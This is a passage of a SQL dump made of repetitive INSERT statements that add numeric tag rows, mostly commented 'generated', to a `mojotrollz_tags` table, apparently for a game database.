'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2672, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2673, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2674, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2675, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2676, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2676, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2678, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2679, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2679, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2680, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2680, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2681, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2681, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2682, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2682, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2683, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2684, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2684, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2685, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2685, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2686, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2686, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2687, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2687, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2688, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2688, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2691, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2691, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2692, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2692, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2693, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2693, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2694, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2694, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2695, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2695, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2696, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2696, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2697, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2697, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2698, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2698, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2699, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2699, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2700, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2700, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2701, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2701, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2703, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2703, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2704, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2704, 1, 2, 1637, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2704, 1, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2704, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2704, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2704, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2705, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2705, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2706, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2706, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2707, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2708, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2708, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2711, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2711, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2712, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2712, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2713, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2713, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2714, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2714, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2715, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2715, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2716, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2716, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2717, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2717, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2718, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2718, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2719, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2719, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2720, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2720, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2721, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2721, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2723, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2723, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2725, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2725, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2726, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2726, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2727, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2727, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2728, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2728, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2729, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2729, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2730, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2730, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2731, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2731, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2732, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2732, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2733, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2733, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2734, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2734, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2735, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2735, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2736, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2736, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2737, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2737, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2738, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2738, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2739, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2739, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2740, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2740, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2742, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2742, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2743, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2743, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2744, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2744, 1, 30, 2, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2745, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2745, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2748, 1, 1, 70, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2748, 1, 2, 1337, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2748, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2749, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2749, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2751, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2751, 1, 30, 2, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2752, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2752, 1, 30, 2, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2753, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2753, 1, 30, 4, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2754, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2754, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2755, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2757, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2759, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2760, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2760, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2761, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2761, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2762, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2762, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2763, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2764, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2764, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2765, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2765, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2766, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2766, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2767, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2767, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2768, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2768, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2769, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2769, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2770, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2770, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2771, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2771, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2772, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2772, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2773, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2773, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2774, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2774, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2775, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2776, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2778, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2778, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2779, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2779, 1, 30, 2, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2780, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2780, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2781, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2781, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2782, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2782, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2783, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2783, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2784, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2784, 1, 2, 1537, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2784, 1, 30, 3, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2785, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2785, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2786, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2786, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2787, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2787, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2788, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2788, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2789, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2789, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2790, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2790, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2791, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2791, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2792, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2792, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2793, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2793, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2794, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2795, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2795, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2796, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2796, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2798, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2798, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2799, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2799, 1, 2, 1497, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2799, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2799, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2799, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2801, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2802, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2802, 1, 2, 1497, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2802, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2802, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2802, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2803, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2803, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2804, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2804, 1, 2, 1497, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2804, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2804, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2804, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2805, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2805, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2806, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2806, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2808, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2808, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, 